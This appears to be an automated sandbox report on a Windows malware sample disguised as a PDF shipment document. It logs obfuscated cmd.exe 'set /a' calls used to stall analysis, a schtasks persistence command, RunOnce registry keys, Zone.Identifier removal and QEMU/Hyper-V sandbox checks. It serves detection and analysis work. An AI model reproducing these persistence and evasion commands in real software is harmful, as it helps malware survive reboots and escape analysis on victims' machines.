Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216675^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x10307B37^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_718D30C0 push eax; ret
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032840A0 push ebp; retf
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03284BB8 push esp; ret
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280BF5 push esi; iretd
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328B3C9 push 00000059h; iretd
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03284221 push ebp; retf
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03283A13 push cs; iretd
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03283250 push ss; ret
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03285AE6 push 38EC4568h; retf
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032882CD push cs; retf
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032896D5 push 38D28568h; ret
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03287D4C push 22C116CCh; ret
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03287D91 pushfd ; retf
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032879EB push FFFFFFB3h; iretd
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328B1CA push eax; iretd
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328ACE4 push ds; retf

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_718D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	File created: C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	File created: C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\nsExec.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.eXe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DD1.tmp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | delete

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: Original Shipment_Document.PDF.exe

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Mass process execution to delay analysis

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"

Tries to detect Any.run

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975454741.0000000003381000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975454741.0000000003381000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5052	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5052	Thread sleep time: -31300s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 1372	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_03281329 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: threadDelayed 626
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: threadDelayed 1018
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: foregroundWindowGot 577
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: foregroundWindowGot 690

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0040683D FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0040290B FindFirstFileW,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\Microsoft.NET\Framework\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5085e86702d2182b0d9417971c65ded2\System.Drawing.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ae952be8fa59744d6333aed90b72f162\System.Windows.Forms.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\Microsoft.NET\

Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975454741.0000000003381000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
